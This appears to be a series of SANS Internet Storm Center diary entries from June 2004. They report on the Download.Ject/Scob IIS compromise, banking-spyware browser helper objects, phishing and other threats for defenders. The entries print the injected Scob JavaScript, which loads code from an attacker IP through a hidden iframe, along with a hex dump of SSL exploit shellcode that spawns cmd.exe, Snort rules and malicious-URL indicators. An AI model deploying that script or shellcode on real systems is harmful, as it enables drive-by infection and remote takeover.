Today an user sent a question about the BHO
(Browser 'Helper' Object) and other browsers than IE. Tom
Liston, one of our ISC Handlers, answered:
"...this could be an issue for any of the major browsers.
While BHOs *are* specific to IE, Mozilla based variants
have "extensions", and all other browsers have a means to
extend their functionality.



The issue under IE is that BHOs can be silently installed
and there is no good way within IE to see what BHOs are on
your machine.



But *any* trojaned extension to *any* browser's
functionality could do the same thing that this malware
does. It then becomes a question of how difficult it is to
get it installed on the target machine..."



Still on the IE issues, we received a report about "a new
exploit targeting at users of Internet Explorer". According
the user, the trojan tries to overwrite the telnet.exe
executable. The file was submitted and we found out that it
is already detectable by AV as the
win32/TrojanDownloader.Harnig.Q trojan.



Another report asks about MAC exposure in the online
banking threat from yesterday's diary. As far as we know,
the binary will only run in Windows.

Banking Spyware Snort Sigs

About yesterday´s diary "New scam targets bank customers", Matt
Jonkman just pointed us to the Snort Signatures for the
Banking Spyware that are posted at bleedingsnort.com:



#Thanks James Ashton

alert tcp $HOME_NET any -> any 80 (msg:"BLEEDING-EDGE
Yesadvertising Banking Spyware RETRIEVE";
uricontent:"/img1big.gif"; nocase;
reference:url,isc.sans.org/presentations/banking_malware.pdf
; sid:2000336; rev:1;)


alert tcp $HOME_NET any -> any 80 (msg:"BLEEDING-EDGE
Yesadvertising Banking Spyware INFORMATION SUBMIT";
uricontent:"/cgi-bin/yes.pl"; nocase;
reference:url,isc.sans.org/presentations/banking_malware.pdf
; sid:2000337; rev:1; )


Reference:
http://www.bleedingsnort.com/cgi-bin/viewcvs.cgi/Stable/MALWARE_Yesadvertising_Banking_Spyware



Port 3705

If you feel that you had enough of the IE<->BHO stuff, here
is something different. We observed an interesting graphic
about port 3705, but dont have much information about this
port. If do you have more info, please let us know.

Portuguese ISCAlert

Are you in portuguese language country?!
Download now the ISCAlert portuguese version!
http://www.labreatechnologies.com/ISCAlert_Portuguese.zip


------------------------------------------------------------

Handler on Duty: Pedro Bueno (bueno_AT_ieee.org)

------------------------------------------

Browser Helper Objects (BHO) scanning tool

------------------------------------------

BHODemon is a free tool that will list all Browser Helper Objects that are installed on a Windows system by scanning the registry and give you the ability to disable them. This will also list "good" BHOs as well, but nevertheless is a useful tool in detecting and disabling malicious software.

It is available at:
http://www.definitivesolutions.com/bhodemon.htm

--------------------------------

New scam targets bank customers

--------------------------------

On June 24th, a visitor to the SANS Internet Storm Center reported that his company was "...in the middle of a very disturbing ... issue regarding the adware/spyware/IE exploit genre..." He requested help analyzing an "encrypted or compressed" file that had been downloaded to a machine at their site. Tom Liston, one of our volunteer handlers, spent the weekend analyzing this issue. His findings are summarized here.

The victim of the attack found that a file called "img1big.gif" had been loaded onto their machine. Because of the account restrictions on the person running the machine, it had failed to install properly, which was why it had come to their attention. It is this file that they forwarded to the SANS Internet Storm Center for analysis.

The file is not a graphic file at all. It is actually a 27648 byte Win32
executable that has been compressed using the Open Source executable compressor UPX. This file decompresses to an 81920 byte file which contains two Win32 executables bound together. The first portion of the file (and what actually runs if the file extension is changed and the program is launched) is a "file dropper" Trojan, designed to install any executable concatenated to its body. The second half of the file consists of a Win32 DLL that is installed by the file dropper under WindowsXP as a randomly named .dll file under C:\WINDOWS\System32\. This DLL is installed as a "Browser Helper Object" (BHO) under Internet Explorer.

A "Browser Helper Object" is a DLL that allows developers to customize and control Internet Explorer. When IE 4.x and higher starts, it reads the registry to locate installed BHO's and then loads them into the memory space for IE. Created BHO's then have access to all the events and properties of that browsing session. This particular BHO watches for HTTPS (secure) access to URLs of several dozen banking and financial sites in multiple countries.

When an outbound HTTPS connection is made to such a URL, the BHO then grabs any
outbound POST/GET data from within IE before it is encrypted by SSL. When it captures data, it creates an outbound HTTP connection to
http://www.refestltd.com/cgi-bin/yes.pl
and feeds the captured data to the script found at that location.

A complete write-up of Tom's findings is available online at http://isc.sans.org/presentations/banking_malware.pdf

Please direct any questions about this issue to the Storm Center using our online contact form at http://isc.sans.org/contact.php

---------------------------

Yesterday's Mailbag on ADSs

---------------------------

A member of the GCWN board has written an honors paper for his certification on ADSs. The paper is located at http://www.giac.org/practical/GCWN/Ryan_Means_GCWN.pdf

{Posted by Marcus H. Sachs, SANS Internet Storm Center Director}

----------------------------------------------------------------

Handler on Duty: John Bambenek, jbamb-at-pentex-net.com

Request for Information: IWAP_WWW account

We have received information about compromised systems with Internet
Information Server. These systems had an administrator level account
with the username 'IWAP_WWW' added.

Please check if your server has such an account and let us know
what you find. Until we know more, we suggest that you consider
a server compromised if you find an administrator account with
this username.

Update at the end of the day, still looking for concrete info

We don't have a lot more information on this than when we posted the
initial info this morning. Apparently some people started noticing it
last Tuesday and there has been some speculation that it may be related
to Berbew, but the Symantec write up on Berbew does not mention the
administrator account, so that connection remains tentative at best.

You can find some of the discussion of this at
http://www.webmasterworld.com/forum10/5849.htm
http://amazingtechs.com/index.php?showtopic=14414

and the Symantec write up on Berbew at
http://www.sarc.com/avcenter/venc/data/backdoor.berbew.f.html

From the mailbag

We received some correspondence today from an educational institution
which has detected what appears to be a fairly large number of GIFs and
JPEGs on their windows web server that have data stashed in the
alternate data streams (a feature of the NTFS file system). We're not sure
yet, how this data got onto the server. We are
still investigating to determine what exactly has been stashed in the
ADSes, but kudos to the admins at this site for even detecting them.
This should serve as a reminder to administrators to monitor disk space
and network usage and when something out of the ordinary occurs investigate
(or get help investigating). We're not certain at this time how damaging
this particular breach might be. If we learn anything interesting, we'll
provide an update. Obligatory SANSFIRE plug: Track 8 will provide you with
information on tools that can be used to investigate alternate data streams
as part of the Windows forensics tools.
-------------------------------------------------------------------

Jim Clausing, jim.clausing at acm.org and

Johannes Ullrich, jullrich_at_sans.org

Continued Sighting of Download.Ject

While the majority of the traffic has died down, we are still receiving reports of administrators finding log files with indicators of msits.exe download. We would like to remind all users that even thought the main issue is over, the same exploit is continuing to be used by web sites out there for malicious purposes. Practically all of the major antivirus services have signatures for this exploit, which is also known as JS.Scob.Trojan, Scob, and JS.Toofeer.

WiFi Security: Final Approval for 802.11i

The new iteration of security will add the Advanced Encryption Standard (AES) to 802.11, the WiFi Wireless technologies. This is a much stronger encryption standard than is found in WPA, which was previously the current standard. The IEEE 802.11i subcommittee, which oversees the development of this security standard, signed off on it last Thursday.

http://www.infoworld.com/article/04/06/25/HNwlan_1.html

Download.Ject Detection and Recovery
Microsoft released more information on their website relating to detecting and recovering from the compromises related to the berbew/scob worm that has been going around in the past week. The web page for more information is

http://support.microsoft.com/?kbid=871277 .



Updated 6/27: If you are absolutely positive that your IIS Server was patched yet was still hit with the recent Download.Ject issues of the past several days, please let the Internet Storm Center know or contact Microsoft Product Support Services at 1-866-PCSafety. There has been reports out of Microsoft (on the patchmanagement mailing list) that all of the infected computers were not patched, or rebooted before the outbreak. If there were cases that were infected and were patched, MS needs to hear about it as that may represent a need to fix the patch itself.
New Phishing Attack Technique



Over the last many users on my campus have received a new style of phishing emails. The email purports to be from a major national bank group, and attempts to hook the end user into confirming your data with this bank. There were a couple of things that make this attack different.

First, the entirety of the body message was an image file. This in and of itself is not unusual as this technique has been used by spammers to evade lexical analysis in mail server filters. In the phishing arena this may not be unusual as this does lend itself to maintaining a consistent look and feel of the email no matter what graphical mail browser the end user may be using which is necessary to maintain the illusion of the email being valid.

The new technique noticed is the use of image map html code. If the end user is using a complaint browser and attempts to click on the image near the URL text, then the user is taken to an obfuscated URL of the hackers choosing and will eventually be asked for all the private information as normal. If the end user is not using a browser that supports image maps, then the user is taken to a login page for the national bank on one of their many servers. Once the end user is on the hackers site, there appears to be some low level web browser detection and will either kick the user to the national bank website, or attempt to play games with the browser to maintain the illusion that you are on the true website.



Using the image map technique appears to be a new trick, and using some sophistication of other techniques, this may make it extremely hard for end users to know the difference between real email from their respective banks and the hackers. Continue to recommend that end users not click on these URLs in bank or other "secure" sites but instead directly enter the main URL for the company in question, or contact the company through the regular customer service phone number.
---

Scott Fendley

ISC Handler on Duty

(for more details, also see yesterday's diary:
http://isc.sans.org/diary.php?date=2004-06-24 )

Updates will be posted here.

UPDATE 17:26 UTC Jan 25 2004


LURHQ published a detailed analysis of the "Berbew" trojan downloaded
by this exploit. According to this analysis, the trojan will capture
passwords as use log into given e-commerce, bank or auction web
sites.
UPDATE 16:10 UTC Jun 25 2004


A reader who's web server was impacted by this attack sent us some findings from his Windows Security Event Logs. The logs showed the following sequence at the time of the incident:

- a process was created for CMD. The user name on the process was the ComputerName with a $ at the end.

- a process then was created for FTP.exe

- then for a file called agent.exe

- then mulitple instances of CSCRIPT were called


Thanks to Micheal Teff for providing this information.



Deb Hale - haled@pionet.net

Handler on Duty


_______________________________________________________________________________
A large number of web sites, some of them quite popular, were
compromised earlier this week to distribute malicious code. The attacker
uploaded a small file with javascript to infected web sites, and altered
the web server configuration to append the script to all files served by
the web server. The Storm Center and others are still investigating
the method used to compromise the servers. Several server
administrators reported that they were fully patched.

If a user visited an infected site, the javascript delivered by the
site would instruct the user's browser to download an executable from
a Russian web site and install it. Different executables were
observed. These trojan horse programs include keystroke loggers, proxy
servers and other back doors providing full access to the infected
system.

The javascript uses a so far unpatched vulnerability in MSIE to
download and execute the code. No warning will be displayed. The user
does not have to click on any links. Just visiting an infected site will
trigger the exploit.


If your SERVER was compromised, you will observe:


* All files sent by the web server will include the javascript.
As the javascript is delivered by the web server as a global
footer, images and other documents (robots.txt, word files)
will include the javascript as well.

* The files on your server will not be altered. The javascript
is included as a global footer and appended by the server
as they are delivered to the browser.

* You will find that the global footer is set to a new file.

* For snort signatures, see http://www.bleedingsnort.com
We do not know at this point how the affected servers have been
compromised. The SSL-PCT exploit is at the top of our list of suspects.
If you find a compromised server, we strongly recommend a complete
rebuild. You may be able to get your web site back into business by
changing the footer setting and removing the javascript file. But this
is a likely a very sophisticated attack and you should expect other
stealthy Backdoors.


If you visited an affected page, and your BROWSER is compromised:


* You may see a warning about a javascript error. But it
depends on how the attack code interfers with other javascript
on the respective page, and many users disable these javascript
warnings.

* Disconnect the system from the network as soon as possible.

* run a thorough virus check with up to date virus definitions.
Many AV vendors released new definitions as recently as last
night.

* If you are able to monitor traffic to the infected host, you
may see attempts to contact 217.107.218.147 on port 80.

We do not have any evidence of any other target IPs being
involved at this point. However, as this ip is no longer
reachable, attackers may plant scripts that point to other
IPs in the future

* AV software will detect the javascript as 'JS.Scob.Trojan'.

FAQ's about this attack:

- Is this the first time web servers have been compromised to
attack browsers?

No. Nimda attempted the same trick, using an older MSIE
exploit. Other attempts have been observed in the past.
This attack is special because it affects a large number
of servers and is not easily detectable.

- Will affected websites be "defaced" or otherwise altered?

No. In most cases, the web sites will look just like usual
to the casual browser. The infected javascript may interfere
with other javascript on the respective page.

- Will the javascript attached to images be executed?

No. The javascript attached to images is harmless. It's the
JavaScript attached to the .htm or .html files that gets
executed, forcing the browser to connect to the Russian site.

- How can I protect my web server from becoming infected
and used as a host for the script?

Apply all necessary patches. If you find an unpatched web
server, assume it has been compromised even if you do not
see an obvious sign of an attack. Given the current threat
environment, an unpatched web server is likely to be attacked
successfully within a few hours.

- How can I protect my users from these web sites. Do you
publish a list? Should they stop browsing?

We do not provide a list of infected sites. Instead we
try to work with site administrators to have them shut down
as soon as possible. Right now, we don't know of any sites
that are still hosting the script. Given that this attack
is likely going to be repeated using different javascript
code, we recommend that you
(*) install and maintain anti virus software
(*) if possible turn off javascript, or use a browser
other then MSIE until the current vulnerabilities
in MSIE are patched.

Relevant Links

Analysis of the underlying MSIE vulnerability:

! This link will trigger some warnings from AV software !

http://62.131.86.111/analysis.htm (thanks to Olivier de Jong)
Symantec writeup for js.scob.trojan:

http://securityresponse.symantec.com/avcenter/venc/data/js.scob.trojan.html
MSIE Exploit information from Security Focus:

http://www.securityfocus.com/bid/10472

http://www.securityfocus.com/bid/10473


CHMM Vulnerability (not used here, but used by similar exploits ) : http://www.securityfocus.com/bid/9658/info/
LURHQ Berbew Analysis:
http://www.lurhq.com/berbew.html

F-Secure Information:

http://www.f-secure.com/weblog/

http://www.f-secure.com/v-descs/scob.shtml

http://www.f-secure.com/v-descs/padodorw.shtml
Microsoft Alert:

http://www.microsoft.com/security/incident/download_ject.mspx
UseNet Discussion about IIS exploits:

http://www.derkeiler.com/Newsgroups/microsoft.public.inetserver.iis.security/2004-06/0588.html
Snort Rule:

http://snort.infotex.com/cgi-bin/viewcvs.cgi/Stable/VIRUS_Unknown_IIS_Worm
-------------------------------------------------------------

Johannes Ullrich, jullrich_at_sans.org

.org DNS Issues

This morning, DNS resolution of .org domains appears to fail occasionally.
Preliminary information shows that some of the UltraDNS servers are not
responding. The cause and scope of this problem is unknown so far.
Reports about problems are mostly limited to North America at this time.

UPDATE (1930 UTC) - the .org zone is working now.

Sometimes it helps to use the "dig" command to zero-in on suspected DNS issues. Try this command and modify it as needed when troubleshooting:

% dig sans.org ns +trace


RFI - Russian IIS Hacks?

UPDATE (2100 UTC) - Thanks to everybody who generously provided updates to us today. We still do not know how the IIS servers are originally infected with the JavaScript or the modification to the configuration files. Any additional theories or ideas are welcome.

The reason for the attack seems to point back to the spamming community. There is quite a bit of evidence that what we are seeing is yet another technique for spreading and installing "spamware" (software that assists in either creating, relaying, proxying, or otherwise participating in the sending of spam.) We don't see any evidence that this attack is related to the construction of a DDoS network or other type of typical zombie-based attack group. However, we continue to monitor and will provide updates if anything further develops.

Two readers sent us snips from their proxy logs (thanks, Rich and Mike!) While the flows are slightly different, this is the pattern to look for as an indicator that one of your clients has attempted to visit the Russian site:
NOTE: These links are obfuscated. Accessing these URLs may result
in a virus infection

GET _http_://217.107.218.147/dot.php

GET _http_://217.107.218.147/new.html

GET _http_://217.107.218.147/dot.php

GET _http_://217.107.218.147/new.html

GET _http_://217.107.218.147//main.chm

GET _http_://217.107.218.147/msits.exe

GET _http_://217.107.218.147/redir.php





GET _http_://217.107.218.147/new.html

GET _http_://217.107.218.147/dot.php

GET _http_://217.107.218.147/new.html

GET _http_://217.107.218.147/md.htm

GET _http_://217.107.218.147/redir.php

GET _http_://217.107.218.147/dot.php

GET _http_://217.107.218.147/new.html

GET _http_://217.107.218.147/dot.php

GET _http_://217.107.218.147/new.html

GET _http_://217.107.218.147/md.htm

GET _http_://217.107.218.147/redir.php




One reader (thanks, Ben!) submitted a list of files found on his compromised IIS server. The files he sent us included:

Code snippits.doc

iis6xx.dll (multiple copies, where xx varies)

iis7yy.dll (multiple copies, where yy varies)

Download_Ject_Symantec.doc

ipaddress.txt

issue.csv

ads.vbs

agent.exe

ftpcmd.txt

security_log.rtf




Finally, the executable we mentioned in the previous update (msits.exe) is not detected by most AV suites, contrary to what we earlier thought. Here is what we found when we tested it at virustotal.com:

BitDefender 7.0/20040624 nothing

eTrustAV-Inoc 4641/20040623 nothing

F-Prot 3.14e/20040624 nothing

Kaspersky 3.0/20040625 nothing

McAfee 4369/20040624 nothing

NOD32v2 1.794/20040623 nothing

Norman 5.70.01/20040512 nothing

Panda 7.02.00/20040624 nothing

Sybari 7.50.1138/20040624 [Win32.Webber]

Symantec 8.0/20040624 [Backdoor.Berbew.F]

TrendMicro 1.00/20040624 nothing



UPDATE (1930 UTC) - Several readers have responded and confirmed that this is a wide-spread issue. Here is what we know so far:

- An IIS server's configuration is somehow modified so that "enable document footer" is enabled for various (if not all) files and linked to the new .dll file(s) in \winnt\system32\inetsrv. This might be done with the help of a program called agent.exe installed via one of the multiple known IIS vulnerabilities. (Thanks, Patrick and Ben!)

- When a visitor browses the site, all of the objects with their properties set to "enable document footer" are sent to the client browser with the JavaScript appended to the end of the file. If the visitor is running an updated version of AV software, the modified files (which include images as well as .html) are detected as being infected.

- The visitor's browser is re-directed to the Russian URL listed below where a known Trojan program (msits.exe) is downloaded, along with some additional malware. Again, if the user's machine is updated with current AV software, this malware is detected and blocked. (Thanks, Michael!)

- The earliest reported infection was on June 20th (four days ago).
What we DON'T know, and can use some help in figuring out, is how the malware is installed on the IIS server to begin with. Is there a zero-day floating around? Is it via a known vulnerability and the use of agent.exe as mentioned above? (Ed Skodis, one of our handlers, suggested that perhaps the IIS system admin used a local copy of IE to browse a site and pulled down hostile JavaScript. Does that jive with anybody's findings?)

Our concern is that there might be an IIS zero-day floating around. We won't list the sites that are reported to be infected in order to prevent further abuse, but the list is long and includes businesses that we presume would normally be keeping their sites fully patched.
[original diary entry follows]

A reader pointed us to an IIS discussion group (microsoft.public.inetserver.iis.security) where several IIS administrators discovered some strange .dll files on their web servers in the past 24 hours. According to the discussion on that list, they are all 1kb .dll files. They were deposited in the \winnt\system32\inetsrv directory with names like iis7xy.dll where x is a random number that appears to be between 1-3 and y is a random character or number.

The .dll's contain JavaScript similar to the string below. I've intentionally added some spacing to defang it a bit:
<script language="JavaScript">

<!--
var qxco7=document.cookie;function gc099(n21)

{var ix=qxco7.indexOf(n21+"=");

if(ix==-1)return null;ix=qxco7.indexOf("=",ix)+1;

var es=qxco7.indexOf(";",ix);

if(es==-1)es=qxco7.length;

return unescape(qxco7.substring(ix,es));}

function sc088(n24,v8){var today=new Date();

var expiry=new Date(today.getTime()+600000);

if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+";

expires="+expiry.toGMTString();qxco7=document.cookie;}

function okx12(){window.status="";setTimeout("okx12()", 200);}

okx12();if(location.href.indexOf("https")!=0)

{if(gc099("trk716")==null){document.write

("<script language=\"JavaScript\"

src=\"http://217.107.218.147/dot.php\"></script><iframe

src=\"http://217.107.218.147/dot.php\" height=\"1\" width=\"1\"

scrolling=\"no\" frameborder=\"no\"/>");sc088("trk716","4");}}

// --></script>
There are other reports in the past 24 hours indicating that this JavaScript has been seen appended to text files and other file types.

The Storm Center would like to know if others are seeing this phenomena and if there are any ideas about it origin or intent (other than being an attempt to download malware - that's obvious.) The IP address in the JavaScript points to a Russian site, and at the time of this writing it is still active. A note of caution - that site will attempt to insert malicious code onto a visiting machine. Use extreme caution if you decide to visit it.
Marcus H. Sachs

Handler on Duty

US-CERT yesterday released an advisory, while the Internet Software Consortium
(ISC) released updated software, addressing two vulnerabilities in ISC's
Dynamic Host Configuration Protocol server software. ISC DHCPD is included in
most Unix and Unix-like operating systems.

Joshua Wright of the SANS Institute has confirmed through demonstration
(internal-use only code) that at least one of the two buffer overflow
vulnerabilities is exploitable to deliver a denial of service attack, and most
likely root access with a little more work. It should be assumed that others
(read: "bad guys") are at least as diligent in their efforts to exploit these
vulnerabilities. Although we haven't yet had any reports of compromises
attributable to this, please update your systems and review your overall
defenses. As always, a little bit of prevention goes a long way. Be sure you
are filtering traffic at all network boundaries, be it with a firewall or
screening router, if feasible. 67/UDP is the listening port for DHCP servers,
and should be denied to any untrusted networks.

ISC DHCP 3.0.1rc12 and ISC DHCP 3.0.1rc13 appear to be the only vulnerable
versions. See http://www.us-cert.gov/cas/techalerts/TA04-174A.html for more
info and http://www.isc.org/index.pl?/sw/dhcp/ for software updates.

-------------------

Scanning for Dabber

-------------------

Over the past couple of days there has been a large rise in port 9898 activity
reported http://www.dshield.org/port_report.php?port=9898 . The Dabber worm
(which rides in on the coattails of Sasser) opens a listener on port 9898,
which is then probed by the attacking system to confirm its success. We're
unaware of any "counter-counter" worm that is looking for Dabber backdoors, but
I have seen a significant rise in scanning for it, as well. My honeypotted
networks have seen several sequential SYN "half-open" scans which return a RST
packet whenever the SYN is acknowledged.

Likely, someone is harvesting lists for later use. If anyone captures port 9898
activity other than SYN scanning, please pass that info along.

And the cycle continues.

----------

SSL Attack

----------

Jim Forster reported a possible variant on an existing SSL exploit. Can anyone else correlate against this?:

One of my HoneyPots was hit with what appears to be an altered strain of the THC-IIS SSL Exploit this morning.

#(4 - 55197) [2004-06-23 07:54:46]  HoneyPot 443 TCP

IPv4: 64.144.15.152 -> **.***.***.***

      hlen=5 TOS=0 dlen=391 ID=11410 flags=0 offset=0 TTL=114 chksum=*****

TCP:  port=2557 -> dport: 443  flags=***AP*** seq=1215225933

      ack=177711253 off=5 res=0 win=64240 urp=0 chksum=*****

Payload:  length = 351



000 : 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00   .b..............

010 : 00 EB 0F 46 49 52 45 50 4F 52 54 39 39 39 32 5E   ...FIREPORT9992^

020 : BE 98 EB 25 89 DD D3 03 9C 0B 02 06 6C 59 6C 59   ...%........lYlY

030 : F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F   ......Lp..XFWS2_

040 : 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83   32.DLL........].

050 : ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B   .,j0Yd...@..p...

060 : 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B   x.._<.....[x...K

070 : 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB   ....S$..SQR.[ ..

080 : 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2   1.A1...4....1...

090 : 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75   ..u...E..DE.f9.u

0a0 : E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7   .f1.ZX^VPR+N.A..

0b0 : 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE   .J.......M..D...

0c0 : 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53   M.u..M.t..M$.].S

0d0 : FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82   ....j.X.E..Ey...

0e0 : 50 8B 45 04 35 93 93 93 93 89 45 04 66 8B 45 02   P.E.5.....E.f.E.

0f0 : 66 35 93 93 66 89 45 02 58 89 CE 31 DB 53 53 53   f5..f.E.X..1.SSS

100 : 53 56 46 56 FF D0 89 C7 55 58 66 89 30 6A 10 55   SVFV....UXf.0j.U

110 : 57 FF 55 E0 8D 45 88 50 FF 55 E8 55 55 FF 55 EC   W.U..E.P.U.UU.U.

120 : 8D 44 05 0C 94 53 68 2E 65 78 65 68 5C 63 6D 64   .D...Sh.exeh\cmd

130 : 94 31 D2 8D 45 CC 94 57 57 57 53 53 FE CA 01 F2   .1..E..WWWSS....

140 : 52 94 8D 45 78 50 8D 45 88 50 B1 08 53 53 6A 10   R..ExP.E.P..SSj.

150 : FE CE 52 53 53 53 55 FF 55 F0 6A FF FF 55 E4      ..RSSSU.U.j..U.



Thanks, Jim!

Unreal Engine Heap Overflow:

A heap overflow has been found in the Unreal Engine that is exploitable against machines running many Unreal based games in server mode. Although we have no reports of exploits being used in the wild, it is believed that exploiting this vulnerability to remotely execute code is possible. We recommend that anyone serving one of the vulnerable games based on the Unreal Engine install patches as soon as they become available. Until patches are available, the only secure recourse is to block all UDP traffic to ports 7777 and 7787 (which will, effectively, keep you from acting as a game server). Limiting access to ports 7777 and 7787 to known IPs is not an effective defense because this is a UDP based attack and packets can be spoofed.

RBOT.CC –Very Evil

A reader forwarded us the source code for rbot.cc for our malware analysis team to analyze. While we haven’t had a chance to fully dissect the code, it’s pretty obvious that this thing is very, very evil. In addition to the information presented in yesterday’s diary, it appears that it can be compiled with the ability to exploit many of the backdoors left behind by email worms such as MyDoom and Bagle, as well as carrying exploit code for exploiting holes in Dameware and weak MSSQL passwords.

Another plug for ISCAlert

ISCAlert is a small information application that sits in your systray and keeps you informed of the Infocon status here at the ISC. The download is only 13kb and contains the 6k ISCAlert.exe application and a .pdf file explaining its use. You can download ISCAlert.zip from:

http://www.labreatechnologies.com/ISCAlert.zip">http://www.labreatechnologies.com/ISCAlert.zip

-----------------------------------------------

Handler on duty: Tom Liston ( http://www.labreatechnologies.com )

VERY ISOLATED SPORADIC INTERNET PROBLEMS...
The Internet Storm Center received approximately a dozen reports today of sporadic and intermittent access problems for websites around the world. Locations as wide ranging as the Netherlands, Mexico City, and the Northeastern United States all reported trouble. However, we could discern no pattern in these difficulties, and haven’t detected a widespread infrastructure malfunction or attack at this point. For most users, the Internet was just fine today, thank you very much.

If you ever suspect a widespread problem with Internet connectivity, you can check out a variety of sites to get more information about current availability and access times. Of course, you’ll need enough web access to be able to cruise to these sites. Assuming you do, you may want to look at http://www.internettrafficreport.com/main.htm (which breaks out Asia, Australia, Europe, North America, and South America). Alternatively, if you want a more ISP-centric view of how the Internet health looks, you can check out http://www.internetpulse.net/. Of course, you can also feel free to peek in at http://isc.sans.org to get our view of the world.

For a list of very useful resources that check Internet status, along with a host of valuable information sources and other gizmos, please refer to http://isc.sans.org/links.php

ATTACKS AGAINST IE...
Additionally, we continued to receive reports of attacks against IE browsers, this time loading an ActiveX control on the victim machine using the vulnerabilities described at http://www.securityfocus.com/bid/10472 and http://www.securityfocus.com/bid/10473 . In a surprising twist, the ActiveX control actually downloaded a Certificate Revocation List into the infected system's browser, revoking over one hundred certs. We’re happy to report that anti-virus signatures were successful in detecting the malicious ActiveX control.

RBOT.CC - EVIL, BUT A REHASH OF OLD EXPLOITS...
We also received a report of a nasty attack with the Rbot.cc worm described by Trend Micro here: http://fr.trendmicro-europe.com/enterprise/security_info/ve_detail.php?VName=WORM_RBOT.CC&VSect=T

This worm vociferously scans for TCP port 445, and then tries to break in via RPC DCOM flaws (a la Blaster), IIS5/WebDAV flaws (a la Nachi/Welchia), and LSASS vulnerabilties (a la Sasser). When it infects a system, Rbot.cc runs a process called systemse.exe that starts at boot time. Be on the lookout for it in your environment.

YESTERDAY'S HTTP GET MYSTERY UPDATE...
Finally, we had that mysterious HTTP GET request to the Honeypot in yesterday’s diary:

GET /2004/6/18/18/54/15/ HTTP/1.1
User-Agent: Mozilla/777.1 (compatible; MSIE 888.12; Windows NT 999.1)
Host: xxx.xxx.xxx.xxx:29296

A handful of people suggested that someone was attempting to access a blog management tool or other content management system, based on the first element of the HTTP request including a specific date (GET /2004/6/18/18/54/15/). That theory seems reasonable… However, the strange port number (TCP 29296) is more mysterious. It is possible that a DHCP lease was given to an earlier machine that was running a blog server with a management interface on this port, and a client was looking for that server even though the IP address had been reassigned. That’s our theory for now, and we’re sticking with it unless something better comes along.

Signing out—
--Ed Skoudis, ed(at)intelguardians.com

Overall, there was not much of note happening on Father's Day. Just one little tidbit to mention:



One of the handlers noticed some unusual traffic on a honeypot, but we have been unable to link it to any known tool/exploit/etc...



The traffic involved a connection tcp port 29296 with the following commands:



GET /2004/6/18/18/54/15/ HTTP/1.1

User-Agent: Mozilla/777.1 (compatible; MSIE 888.12; Windows
NT 999.1)

Host: xxx.xxx.xxx.xxx:29296



If anyone recognizes this pattern and has more information please let us know.

ARIN whois problems (Update: Saturday June 19th)

Today, several sources reported problems with accessing the
ARIN whois server. No further details are known at this time.
As of late Saturday, the whois server responded fine.

ZoneAlarm Update Error

Steve Friedl notified us that the website BroadBandReports.com
(BBR, aka. DSLReports.com) is receiving numerous connections from
ZoneAlarm firewalls, requesting the page 'checkupdate.asp'.
A URL like this is used by ZoneAlarm to check for an updated
version of ZoneAlarm. However, the request should only be sent
to ZoneLab's authorized update site.

ZoneLab and BBR are working on a fix. At this point, it is not
clear why Zonalarm installations attempt to use BBR to download
updates. Please notify us if you observe traffic from ZoneAlarm
to the URL 'checkupdate.asp'. ZoneAlarm may be requesting this
page from sites other then the authorized ZoneLabs update site
or BBR. The full request will include post data with details
like the software's exact version and serial number.

http://www.broadbandreports.com/forum/remark,10497002~mode=flat
RoadRunner blocking E-mail Attachments

After several days (weeks?) of reported e-mail instability
at RoadRunner due to recent viruses, RoadRunner today sent
an e-mail to all customers stating that it will start to
remove .com, .exe and .pif attachments from all e-mail.

The recipient of such e-mail will be notified. However, the
sender will not be notified as most viruses use spoofed From
addresses.

We covered both issues in the past. Several large ISPs reported
issues with increased mail volume due to viruses. Our own mail
system was hit hard several times by notifications sent to
us due to spoofed headers (most notable last August during
Sobig).

Identifying Unauthorized Network Connections

For larger networks, keeping track of assets connected to the
network can be a challenge. Brian Grainer, one of our handlers,
recently observed outbound NTP connections from his network,
which he traced back to unauthorized wireless access points.
Even many low end wireless access points and routers, which
can be used to hide systems from discovery, do use NTP. Watching
for outbound NTP traffic is a nice trick to be added to
discover these systems. Watching for new MAC addresses using
tools like arpwatch is usually used for this function. However,
many home-routers can be configured to use the MAC address of
an existing system, or in a large switched network, it can be
difficult to implement arpwatch. Monitoring for anomalies in
outbound traffic is very useful, even if it is done without
detailed packet content analysis. Simple tools like iptraf,
tcpdump, or more fancy tools like ntop ( http://www.ntop.org )
will easily spot traffic anomalies.

Mailbag: How to tell your consultant is a fraud

Occasionally, we receive notes from "consultants" asking
for help. While there is nothing wrong with asking for help,
today's case did make it very evident that the term "consultant"
does not always include expertise or subject knowledge.
This person, evidently advising some small company in network
and security matters, was asking why IANA took over the network
of one of his clients and assigned it 169.254.0.0/16 addresses.
Evidently, he found that the network of his client uses these
IPs, queried whois, and received in return the information about
this IP range being reserved by IANA.

Even after our handlers explained the fact that Windows systems
will use this IP range if they are not assigned an IP from a DHCP
server, he remained skeptical.

We recommend careful reference and certification check for all
consultants you may hire. Putting your network security in the
hands of untrained persons could put your business at risk.

------------------------------------------------------------

Johannes Ullrich, jullrich_AT_sans.org

Announcing ISCAlert

Tom Liston, Internet Storm Center handler, and author of LaBrea ( http://labrea.sourceforge.net/ ) has just released ISCAlert. Per Tom, "ISCAlert is a small program that monitors the SANS Institute’s Internet Storm Center (ISC) and displays an icon in the system-tray indicating the current “Infocon” level. The ISC’s Infocon status is used to reflect changes in malicious traffic and the possibility of disrupted connectivity on the Internet. Information on the meanings of the various Infocon levels can be found at http://isc.incidents.org/infocon.php ."

ISCAlert is available for Microsoft Windows platforms here: http://www.labreatechnologies.com/ISCAlert.zip

(Note: the MD5 sum of the file "ISCAlert.exe" is 0081f58c7887d29891e7cea5ef8034f8)

Email Worms Bog Down ISPs

